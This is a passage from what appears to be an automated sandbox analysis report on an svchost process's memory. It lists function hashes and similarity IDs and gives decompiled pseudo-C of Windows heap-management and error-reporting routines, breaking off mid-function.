                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction Fuzzy Hash: A7E012B2200208ABDB24EF99DC40EA777ADAF88654F118558BE095B241C630F9108AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0238F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,02388D14,?), ref: 0238F6EB
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                        • Instruction ID: 125c6ad261325fe70edd8f33e7dfa4a23c45d01fb46892054f5d313bbf44c059
                        • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                        • Instruction Fuzzy Hash: 21D0A7727503043BEA10FAA49C03F2733CD5B45B08F490074FA48DB3C3D954E4014565
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0306967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 9e8985a3be734ec70ee4ad07401b19b88cc60a15a726517dd00c4d36c2fdacf2
                        • Instruction ID: cdb79ad2e31fa826ae7d4cb977ba4787c79bca203d8ccb2fece8f0ca1682f61b
                        • Opcode Fuzzy Hash: 9e8985a3be734ec70ee4ad07401b19b88cc60a15a726517dd00c4d36c2fdacf2
                        • Instruction Fuzzy Hash: E9B09B71D035C5C5E651D76047087177A447BD0741F16C051E1020681E4778C091F5B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 030DB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 030DB484
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 030DB3D6
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 030DB53F
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 030DB38F
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 030DB2F3
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 030DB305
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 030DB352
                        • <unknown>, xrefs: 030DB27E, 030DB2D1, 030DB350, 030DB399, 030DB417, 030DB48E
                        • The resource is owned exclusively by thread %p, xrefs: 030DB374
                        • The critical section is owned by thread %p., xrefs: 030DB3B9
                        • write to, xrefs: 030DB4A6
                        • a NULL pointer, xrefs: 030DB4E0
                        • *** Inpage error in %ws:%s, xrefs: 030DB418
                        • an invalid address, %p, xrefs: 030DB4CF
                        • Go determine why that thread has not released the critical section., xrefs: 030DB3C5
                        • This failed because of error %Ix., xrefs: 030DB446
                        • read from, xrefs: 030DB4AD, 030DB4B2
                        • The instruction at %p tried to %s , xrefs: 030DB4B6
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 030DB314
                        • *** enter .exr %p for the exception record, xrefs: 030DB4F1
                        • *** then kb to get the faulting stack, xrefs: 030DB51C
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 030DB2DC
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 030DB476
                        • The instruction at %p referenced memory at %p., xrefs: 030DB432
                        • The resource is owned shared by %d threads, xrefs: 030DB37E
                        • *** enter .cxr %p for the context, xrefs: 030DB50D
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 030DB47D
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 030DB39B
                        • *** An Access Violation occurred in %ws:%s, xrefs: 030DB48F
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 030DB323
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: 109be01adbc766a1405cdd831eab62c10cb8487b44719fa157410c7fb8d61857
                        • Instruction ID: 7ea76fedc04d0e69e1cd1526311c4eef2be25f575d2a8ddd30b313dd7386c756
                        • Opcode Fuzzy Hash: 109be01adbc766a1405cdd831eab62c10cb8487b44719fa157410c7fb8d61857
                        • Instruction Fuzzy Hash: BA81C179A43310FFCB22EE05DC45EBF7BB6AF87A51F464084F5041F112D2A68561DAB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030E1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                        Download Yara Rule
                        C-Code - Quality: 44%
                        			E030E1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x30048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0302B150();
				} else {
					E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x311589c);
				E0302B150("Heap error detected at %p (heap handle %p)\n",  *0x31158a0);
				_t27 =  *0x3115898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M030E1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0302B150();
				} else {
					E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0302B150("Error code: %d - %s\n",  *0x3115898);
				_t113 =  *0x31158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0302B150();
					} else {
						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0302B150("Parameter1: %p\n",  *0x31158a4);
				}
				_t115 =  *0x31158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0302B150();
					} else {
						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0302B150("Parameter2: %p\n",  *0x31158a8);
				}
				_t117 =  *0x31158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0302B150();
					} else {
						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0302B150("Parameter3: %p\n",  *0x31158ac);
				}
				_t119 =  *0x31158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0302B150();
					} else {
						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x31158b4);
					E0302B150("Last known valid blocks: before - %p, after - %p\n",  *0x31158b0);
				} else {
					_t120 =  *0x31158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0302B150();
				} else {
					E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0302B150("Stack trace available at %p\n", 0x31158c0);
			}











                        0x030e1c10
                        0x030e1c16
                        0x030e1c1e
                        0x030e1c3d
                        0x030e1c3e
                        0x030e1c20
                        0x030e1c35
                        0x030e1c3a
                        0x030e1c44
                        0x030e1c55
                        0x030e1c5a
                        0x030e1c65
                        0x030e1c67
                        0x00000000
                        0x030e1c6e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030e1c67
                        0x030e1cdc
                        0x030e1ce5
                        0x030e1d04
                        0x030e1d05
                        0x030e1ce7
                        0x030e1cfc
                        0x030e1d01
                        0x030e1d0b
                        0x030e1d17
                        0x030e1d1f
                        0x030e1d25
                        0x030e1d30
                        0x030e1d4f
                        0x030e1d50
                        0x030e1d32
                        0x030e1d47
                        0x030e1d4c
                        0x030e1d61
                        0x030e1d67
                        0x030e1d68
                        0x030e1d6e
                        0x030e1d79
                        0x030e1d98
                        0x030e1d99
                        0x030e1d7b
                        0x030e1d90
                        0x030e1d95
                        0x030e1daa
                        0x030e1db0
                        0x030e1db1
                        0x030e1db7
                        0x030e1dc2
                        0x030e1de1
                        0x030e1de2
                        0x030e1dc4
                        0x030e1dd9
                        0x030e1dde
                        0x030e1df3
                        0x030e1df9
                        0x030e1dfa
                        0x030e1e00
                        0x030e1e0a
                        0x030e1e13
                        0x030e1e32
                        0x030e1e33
                        0x030e1e15
                        0x030e1e2a
                        0x030e1e2f
                        0x030e1e39
                        0x030e1e4a
                        0x030e1e02
                        0x030e1e02
                        0x030e1e08
                        0x00000000
                        0x00000000
                        0x030e1e08
                        0x030e1e5b
                        0x030e1e7a
                        0x030e1e7b
                        0x030e1e5d
                        0x030e1e72
                        0x030e1e77
                        0x030e1e95

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: e742093539572c058e710eb3589a833b9d26c0167ff298d49f9aa1417a0a7307
                        • Instruction ID: 01bd5c2e29aaf1d5643ea287b9838338e2fbbaa0bc2a56db919331a29216dd03
                        • Opcode Fuzzy Hash: e742093539572c058e710eb3589a833b9d26c0167ff298d49f9aa1417a0a7307
                        • Instruction Fuzzy Hash: 9F61F936717268DFD219E789D485E6C77E5EB88930B89847EF80A9F341C6709C90CB19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E0304A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x3118a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0304A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0304DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E03029373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0302A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x3118748 - 1;
						if( *0x3118748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0302B150();
								} else {
									E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0302B150();
								__eflags =  *0x3117bc8;
								if( *0x3117bc8 == 0) {
									__eflags = 1;
									E030E2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x3118748 - 1;
							if( *0x3118748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0305174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E03047D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E030E14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E03029373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E03029819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x3118748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0302B150();
											} else {
												E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0302B150();
											_pop(_t491);
											__eflags =  *0x3117bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E030E2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E030EA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0304A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E03047D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E03047D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E030E1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E03047D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E03047D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x3118748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0302B150();
							} else {
								E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0302B150();
							__eflags =  *0x3117bc8;
							if( *0x3117bc8 == 0) {
								__eflags = 0;
								E030E2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x3118748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0302B150();
												} else {
													E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0302B150();
												__eflags =  *0x3117bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E030E2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E030EA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0304A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0304B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0304A830(_t553, _v64, _v24);
								_t286 = E03047D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E03047D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
